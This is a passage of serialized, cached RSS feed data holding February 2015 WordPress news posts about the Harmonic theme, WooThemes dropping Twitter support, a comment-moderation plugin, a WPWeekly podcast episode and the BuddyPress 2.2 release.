template.</p>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/harmonic.png\" rel=\"prettyphoto[38617]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/harmonic.png?resize=880%2C660\" alt=\"harmonic\" class=\"aligncenter size-full wp-image-38619\" /></a></p>\n<p>Each section of the scrolling front page has options in the customizer that let you assign a unique display. The customizer allows you to easily set a background for the news, page, widgets, and portfolio sections. You can even include a background shade so that the title and tagline are more readable. The Visibility options allow you to hide any of the sections you’re not currently using.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/harmonic-customizer.png\" rel=\"prettyphoto[38617]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/harmonic-customizer.png?resize=1025%2C542\" alt=\"harmonic-customizer\" class=\"aligncenter size-full wp-image-38629\" /></a></p>\n<p>Single posts and pages with a featured image will display in a fullscreen design similar to the homepage. The blog archive is available with your choice of a one or two-column layout.</p>\n<p>With the addition of Jetpack, Harmonic also supports site logo upload and a portfolio. The customizer includes options for three different thumbnail aspect ratios, including: landscape (4:3), portrait (3:4), and square (1:1).</p>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/media.jpg\" rel=\"prettyphoto[38617]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/media.jpg?resize=1025%2C748\" alt=\"media\" class=\"aligncenter size-full wp-image-38635\" /></a></p>\n<p>Harmonic includes a custom menu for social links and has support for 16 different social networks. Check out the <a href=\"https://harmonicdemo.wordpress.com/\" target=\"_blank\">live demo</a> on WordPress.com to see the theme in action.</p>\n<p>With the release of <a href=\"https://wordpress.org/themes/harmonic\" target=\"_blank\">Harmonic</a> for self-hosted sites, Automattic now has 60 free themes available in the directory. This theme caters to visual artists and bloggers who have large images to showcase in the background, portfolio, or gallery sections of the site.</p>\n<p>Harmonic is unique in that it transforms featured images and titles into a splash page style intro to single posts. If you want to use images to make a strong impact on your reader, this theme fits the bill. It’s available on both WordPress.com and self-hosted WordPress sites via the admin themes browser.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 06 Feb 2015 08:19:58 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"Matt: Real NFL Scandal\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44652\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:38:\"http://ma.tt/2015/02/real-nfl-scandal/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1108:\"<blockquote><p>Seattle’s decision to throw the ball at the goal line with 20 seconds to go in last night’s Super Bowl was a costly one. But in the long run, it won’t be nearly as costly to the rest of the United States as the National Football League (NFL) itself.</p>\n<p>Every year, the NFL rakes in around $9.5 billion in revenue. Its commissioner, Roger Goodell, meanwhile, has an annual salary of $44 million. And while those numbers might make sense for any big business, the NFL isn’t a business – not technically, at least.</p>\n<p>According to the Public Law 89-800, it’s a 501(c)6 tax-exempt nonprofit. That’s right, a nonprofit. In other words, the NFL, one of the most lucrative organizations in all of sports, is subsidized by you and me the taxpayers.</p></blockquote>\n<p>From <a href=\"http://www.truth-out.org/opinion/item/28885-the-real-nfl-scandal\">The Real NFL Scandal</a>. If you’re curious, here’s a <a href=\"http://en.wikipedia.org/wiki/Category:501(c)(6)_nonprofit_organizations\">list of other notable 501(c)(6) organizations</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 06 Feb 2015 00:47:45 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"WPTavern: Why WooThemes is Smart to Discontinue Its Twitter Support\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38563\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"http://wptavern.com/why-woothemes-is-smart-to-discontinue-its-twitter-support\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3992:\"<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/woo-support-twitter-account.jpg\" rel=\"prettyphoto[38563]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/woo-support-twitter-account.jpg?resize=1025%2C495\" alt=\"woo-support-twitter-account\" class=\"aligncenter size-full wp-image-38610\" /></a></p>\n<p>WooThemes <a href=\"http://www.woothemes.com/2015/02/retiring-woosupport-twitter/\" target=\"_blank\">announced</a> this week that it will be retiring @WooSupport, its Twitter support account, in favor of other support channels. Social media manager Marina Pape reports that support at the company is otherwise healthy. “On the contrary, our support is cooking with Customer Happiness this week averaging 90%, all support teams coming in under 24 hours for first-reply time,” she said.</p>\n<p>WooThemes, like many other WordPress product and service providers, had expanded channels to try to offer support on as many different social channels as possible. Last October, the company <a href=\"http://www.woothemes.com/2014/10/glimpse-world-woosupport/\" target=\"_blank\">announced</a> changes in its support structure:</p>\n<blockquote><p>We’re opening more and more avenues of communication like the Community, the @WooSupport Twitter handle, and a streamlined Knowledge Base, as well as actively monitoring our social media and ideas boards. You name it, we’re working on it.</p></blockquote>\n<p>Over the past several months, WooThemes has discovered that offering Twitter support is more trouble than it’s worth. “Questions get technical and DMs and 140 characters are not ideal facilitators of such things,” Pape said in the announcement.</p>\n<p>“Yes, we want to encourage conversation. Yes, we want to have an ear to the ground and be able to help people when the rubber hits the road for them and escalate tickets if people have been waiting for unusually long periods,” she said. <strong>“But the truth of the matter is Twitter is not the place to handle support queries and when we try we shoot ourselves in the collective foot.”</strong></p>\n<p>WooThemes is making a smart move to pull back from a medium that wasn’t built to handle complex support queries. Instead of spreading staff thin over every social avenue, the company is concentrating on channeling users through an established ticketing system that is already working.</p>\n<p>While anyone can use Twitter for whatever purpose, within its 140 character limit, the brevity that the medium was designed for is not a good fit for managing support. If users find frustration in communicating within Twitter’s limited capacity, support on this channel is a waste of company time and resources.</p>\n<p>“But after letting @WooSupport run for a while, we realized what it was actually doing was creating an expectation that we never intended to meet which was that we were able to actually give support over Twitter,” Pape explained. <strong>“140 characters are not enough to talk about the weather let alone why your custom-built-million-moving-parts website is breaking.”</strong></p>\n<p>WooThemes is opting to limit support to its ZenDesk ticketing system, instead of having social media managers playing middleman via tweets. “DMs on Twitter to get details and sort out problems is akin to birthing pineapples,” Pape said. Encouraging the ticketing system as the primary avenue of support is a move toward greater efficiency.</p>\n<p>WordPress hosting companies and product/service providers would do well to examine how they are using their various social channels and whether or not some could be trimmed back in favor of more suitable mediums for communication. Cutting out Twitter support may not be the answer for every product or customer demographic, but being “always on” and “always available” via every channel is not a realistic approach to support.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 05 Feb 2015 20:56:01 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:95:\"WPTavern: Thoughtful Comments Plugin Adds Comment Moderation Links to the Frontend of WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38542\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:105:\"http://wptavern.com/thoughtful-comments-plugin-adds-comment-moderation-links-to-the-frontend-of-wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3054:\"<a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/ThoughfulCommentsFeaturedImage.png\" rel=\"prettyphoto[38542]\"><img class=\"size-full wp-image-38557\" src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/ThoughfulCommentsFeaturedImage.png?resize=669%2C348\" alt=\"Thoughful Comments Featured Image\" /></a>photo credit: <a href=\"http://www.flickr.com/photos/98640399@N08/9410826173\">GirlOnRail_BKGs_BartaIV 1024×768</a> – <a href=\"https://creativecommons.org/licenses/by/2.0/\">(license)</a>\n<p>The backend of WordPress has a set of tools to help administrators moderate comments, but what if you could bring some of those tools to the frontend? Developed by <a title=\"http://foliovision.com\" href=\"http://foliovision.com\">Foliovision</a>, <a title=\"https://wordpress.org/plugins/thoughtful-comments/\" href=\"https://wordpress.org/plugins/thoughtful-comments/\">Thoughtful Comments</a> is compatible with Jetpack Comments and adds the following links to comments on the frontend of WordPress:</p>\n<ul>\n<li>Approve</li>\n<li>Delete</li>\n<li>Delete Thread</li>\n<li>Delete and Ban IP</li>\n<li>Delete Thread and Ban IP</li>\n</ul>\n<p>Usernames highlighted in red indicate a comment that’s in the moderation queue. You can either approve, delete, or delete and ban the IP address of moderated comments. It’s important to note that deleted comments are sent to the trash instead of being removed completely from WordPress. For this reason, I think the Delete link should be renamed to Trash so its function makes more sense.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/CommentInModeration.png\" rel=\"prettyphoto[38542]\"><img class=\"size-full wp-image-38554\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/CommentInModeration.png?resize=708%2C293\" alt=\"Comment in Moderation Status\" /></a>Comment in Moderation Status\n<p>You can also delete entire threads.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/ThoughtfulCommentsLinks.png\" rel=\"prettyphoto[38542]\"><img class=\"size-full wp-image-38555\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/ThoughtfulCommentsLinks.png?resize=640%2C267\" alt=\"Various Administration Links\" /></a>Various Administration Links\n<p>Editing posts, administering comments, and managing a site from the frontend is a huge time saver. With <a title=\"https://wordpress.org/plugins/wp-front-end-editor/\" href=\"https://wordpress.org/plugins/wp-front-end-editor/\">certain aspects of WordPress</a> making their way to the frontend, I wouldn’t be surprised if one day, the features within Thoughtful Comments end up in core. In the future, I think users will expect to be able to accomplish specific tasks like these without having to browse through clunky administration screens.</p>\n<p>Thoughtful Comments is compatible with WordPress 4.1 and available from the <a title=\"https://wordpress.org/plugins/thoughtful-comments/\" href=\"https://wordpress.org/plugins/thoughtful-comments/\">WordPress plugin directory</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 05 Feb 2015 18:33:53 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:78:\"WPTavern: WPWeekly Episode 178 – A Conversation With Frenemy Brian Krogsgard\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:44:\"http://wptavern.com?p=38572&preview_id=38572\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:84:\"http://wptavern.com/wpweekly-episode-178-a-conversation-with-frenemy-brian-krogsgard\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3687:\"<p>In this episode of WordPress Weekly, <a title=\"http://marcuscouch.com/\" href=\"http://marcuscouch.com/\">Marcus Couch</a> and I are joined by the founder of <a title=\"https://poststatus.com/\" href=\"https://poststatus.com/\">PostStatus</a>, Brian Krogsgard. He explains how his experience writing for WPCandy provided the foundation to launch PostStatus. We find out how well the <a title=\"https://poststatus.com/club/\" href=\"https://poststatus.com/club/\">PostStatus club</a> is doing since launching two weeks ago. Last but not least, we discuss whether or not Krogsgard has the right ingredients to be financially successful in the WordPress content business.</p>\n<h2>Stories Discussed:</h2>\n<p><a title=\"http://wptavern.com/envato-stats-tips-for-getting-things-done-and-more-at-pressnomics-3\" href=\"http://wptavern.com/envato-stats-tips-for-getting-things-done-and-more-at-pressnomics-3\">Recap of PressNomics 3</a><br />\n<a title=\"http://wptavern.com/human-made-acquires-australian-based-wordpress-agency-sennza\" href=\"http://wptavern.com/human-made-acquires-australian-based-wordpress-agency-sennza\">Human Made Acquires Australian Based WordPress Agency Sennza</a><br />\n<a title=\"http://wptavern.com/zero-day-vulnerability-discovered-in-fancybox-for-wordpress-plugin\" href=\"http://wptavern.com/zero-day-vulnerability-discovered-in-fancybox-for-wordpress-plugin\">Zero Day Vulnerability Discovered in Fancybox for WordPress Plugin</a><br />\n<a title=\"http://wptavern.com/buddypress-2-2-spumoni-released-featuring-new-member-type-api\" href=\"http://wptavern.com/buddypress-2-2-spumoni-released-featuring-new-member-type-api\">BuddyPress 2.2 Spumoni Released, Featuring New Member Type API</a></p>\n<h2>Plugins Picked By Marcus:</h2>\n<p><a title=\"https://wordpress.org/plugins/user-roles-and-capabilities/\" href=\"https://wordpress.org/plugins/user-roles-and-capabilities/\">User Roles and Capabilities</a> allows you to manage user roles and capabilities. Using this plugin, you can create new roles and delete existing roles.</p>\n<p><a title=\"https://wordpress.org/plugins/wp-style-kit/\" href=\"https://wordpress.org/plugins/wp-style-kit/\">WP Style Kit</a> is a plugin that adds additional features to the Custom Styles section of the Visual Editor. You can add beautiful custom styles such as, additional headlines, custom bullets, circles, quotes, and call out boxes.</p>\n<p><a title=\"https://wordpress.org/plugins/pet-adoption-listings/\" href=\"https://wordpress.org/plugins/pet-adoption-listings/\">Pet Adoption Listings</a> provides two easy ways to display listings of adoptable pets from a shelter’s profile at Adopt-a-Pet.com via an iframe.</p>\n<p><a title=\"https://wordpress.org/plugins/login-joomla-users/\" href=\"https://wordpress.org/plugins/login-joomla-users/\">Login Joomla Users</a> allows migrated users from Joomla to login to WordPress. Tested on WordPress 4.1 with users migrated from Joomla 2.5.9. After the first successful login, the password field will automatically be hashed by WordPress.</p>\n<h2>WPWeekly Meta:</h2>\n<p><strong>Next Episode:</strong> Wednesday, February 11th 9:30 P.M. Eastern</p>\n<p><strong>Subscribe To WPWeekly Via Itunes: </strong><a href=\"https://itunes.apple.com/us/podcast/wordpress-weekly/id694849738\" target=\"_blank\">Click here to subscribe</a></p>\n<p><strong>Subscribe To WPWeekly Via RSS: </strong><a href=\"http://www.wptavern.com/feed/podcast\" target=\"_blank\">Click here to subscribe</a></p>\n<p><strong>Subscribe To WPWeekly Via Stitcher Radio: </strong><a href=\"http://www.stitcher.com/podcast/wordpress-weekly-podcast?refid=stpr\" target=\"_blank\">Click here to subscribe</a></p>\n<p><strong>Listen To Episode #178:</strong><br />\n</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 05 Feb 2015 17:33:40 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"Matt: Great Doctorow Essay\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44631\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:42:\"http://ma.tt/2015/02/great-doctorow-essay/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:157:\"<p>Cory Doctorow on <a href=\"http://www.wired.com/2014/12/government-computer-security\">How Laws Restricting Tech Actually Expose Us to Greater Harm</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 05 Feb 2015 05:50:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"WPTavern: BuddyPress 2.2 Spumoni Released, Featuring New Member Type API\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37925\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:81:\"http://wptavern.com/buddypress-2-2-spumoni-released-featuring-new-member-type-api\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5548:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/l-and-b.jpg\" rel=\"prettyphoto[37925]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/l-and-b.jpg?resize=1025%2C498\" alt=\"l-and-b\" class=\"aligncenter size-full wp-image-38537\" /></a></p>\n<p>BuddyPress 2.2 “<a href=\"https://buddypress.org/2015/02/buddypress-2-2-spumoni/\" target=\"_blank\">Spumoni</a>” was released today. The name pays tribute to<a href=\"http://www.spumonigardens.com/\" target=\"_blank\"> L&B Spumoni Gardens</a>, a 70 year old, family-owned pizza joint in Brooklyn, NY. This release is packed full of features that offer developers more flexibility in extending BuddyPress.</p>\n<h2>New Member Type API</h2>\n<p>BuddyPress 2.2 introduces a basic <a href=\"http://wptavern.com/buddypress-2-2-on-track-to-provide-a-basic-member-type-api\" target=\"_blank\">Member Type API</a> that developers can use to create different user types, i.e. student, teacher, etc. This new API is a huge step forward for building niche social networks on top of WordPress. It makes it possible to restrict content, filter the member directory, assign different permissions, etc., based on different member types.</p>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/member-types.png\" rel=\"prettyphoto[37925]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/member-types.png?resize=304%2C173\" alt=\"member-types\" class=\"aligncenter size-full wp-image-38546\" /></a></p>\n<p>The API does nothing visible for users in this first iteration but can be utilized to create plugins that register different member types and build out further capabilities from there. Admins will be able to change a user’s member type, which is currently limited to one, via a new meta box that is added to the community profile screen.</p>\n<h2>Custom Post Type Support Added to the Activity Stream</h2>\n<p>Custom post type support for the activity stream is a major feature that has been <a href=\"https://buddypress.trac.wordpress.org/ticket/3460\" target=\"_blank\">three years in the making</a>. Developers can now add support for their post types to be tracked in the activity stream in the same way that updates appear for regular posts via the blogs component. Adding support for CPTs is as simple as including one line of code:</p>\n<pre class=\"brush: php; light: true; title: ; notranslate\">add_post_type_support( \'book\', \'buddypress-activity\' );</pre>\n<p>Note that this feature isn’t automatically turned on – a custom post type must declare support for it. The single line of code will add a generic update that can be further customized via arguments added when registering the post type. Comment support for CPT activity items is also optional.</p>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2014/12/cpt-activity.png\" rel=\"prettyphoto[37925]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2014/12/cpt-activity.png?resize=1025%2C326\" alt=\"cpt-activity\" class=\"aligncenter size-full wp-image-35302\" /></a></p>\n<p>Custom post types with activity stream support can then be easily sorted via the activity dropdown filters:</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2014/12/activity-dropdown.png\" rel=\"prettyphoto[37925]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2014/12/activity-dropdown.png?resize=1025%2C366\" alt=\"activity-dropdown\" class=\"aligncenter size-full wp-image-35299\" /></a></p>\n<p>Check out the BuddyPress codex for more information on <a href=\"https://codex.buddypress.org/plugindev/post-types-activities/#adding-the-buddypress-support-and-specific-labels-at-post-type-registration\" target=\"_blank\">how to customize activity attributes</a> when registering a custom post type.</p>\n<p>This release also <a href=\"http://wptavern.com/buddypress-2-2-will-add-support-for-composer\" target=\"_blank\">adds support for Composer</a>. BuddyPress will soon be listed at <a href=\"https://packagist.org/\" target=\"_blank\">Packagist.org</a> now that the official release is out.</p>\n<p>Other notable features and improvements include:</p>\n<ul>\n<li>Several new query API’s (based on WordPress improvements) for retrieving more specific results</li>\n<li>Continued cache enhancements, particularly for multi-site and multi-network WordPress configurations</li>\n<li>Message Meta – Private message conversations are now more flexible with an additional metadata table</li>\n<li>The Activity and Extended Profiles components now support advanced conditional logic, like nested clauses and multiple operators — A AND ( B OR C ). The Activity component now also supports querying by multiple scopes.</li>\n<li>Mentions: Better support for responsive devices</li>\n<li>Improved UI for managing messages, new “Read/Unread” links for each message thread, better bulk message management</li>\n<li>Numerous improvements to the Legacy template pack</li>\n<li>Increased coverage of inline code documentation, actions, and filters</li>\n</ul>\n<p>Check out the full list of improvements on the <a href=\"https://codex.buddypress.org/releases/version-2-2/\" target=\"_blank\">2.2 version page</a> in the codex.</p>\n<p>BuddyPress 2.2 is the result of several months of hard work from 44 contributors. The new features in this release enable the plugin to be more flexible for building niche social networks with different user types and custom content types integrated into the activity stream. The official BuddyPress 2.2 update is now available via the WordPress admin.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 05 Feb 2015 00:26:28 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:10;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:45:\"Post Status: WordPress lead developer 